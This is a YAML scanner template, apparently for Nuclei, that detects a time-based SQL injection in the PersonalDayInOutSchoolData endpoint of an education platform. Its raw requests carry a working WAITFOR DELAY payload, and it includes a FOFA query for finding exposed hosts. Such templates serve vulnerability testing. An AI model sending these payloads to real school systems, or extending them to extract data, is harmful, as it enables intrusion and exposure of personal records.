http:
    - matchers:
        - condition: and
          dsl:
            - duration_1>=4 && duration_1<=5
            - duration_2>=8 && duration_2<=9
          type: dsl
      raw:
        - |
          POST /ashx/APP/InOutSchoolService.ashx?action=PersonalDayInOutSchoolData&Date=1%27%3BWAITFOR+DELAY+%270%3A0%3A4%27--&AccountNo=1 HTTP/1.1
          Host: {{Hostname}}
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
        - |
          POST /ashx/APP/InOutSchoolService.ashx?action=PersonalDayInOutSchoolData&Date=1%27%3BWAITFOR+DELAY+%270%3A0%3A8%27--&AccountNo=1 HTTP/1.1
          Host: {{Hostname}}
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
id: EDU-zhihuipingtai-PersonalDayInOutSchoolData-sql
info:
    author: Superhero
    description: |-
        fofa: body="custom/blue/uimaker/easyui.css"
        EDU 某智慧平台 PersonalDayInOutSchoolData 接口存在SQL注入漏洞，未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息（例如，管理员后台密码、站点的用户个人信息）之外，甚至在高权限的情况可向服务器中写入木马，进一步获取服务器系统权限。
    name: EDU 某智慧平台 PersonalDayInOutSchoolData SQL延时注入漏洞
    reference:
        - https://mp.weixin.qq.com/s?__biz=MzkzMTcwMTg1Mg==&mid=2247487736&idx=1&sn=e2c826aa5c8931cc7b8de68caa47b576&chksm=c267a5cbf5102cdd521d070441d1724d56bca3edc57ec02eb1fbc99877b099f40ea7d839371c&token=65579130&lang=zh_CN#rd
    severity: high
    tags:
        - uIP
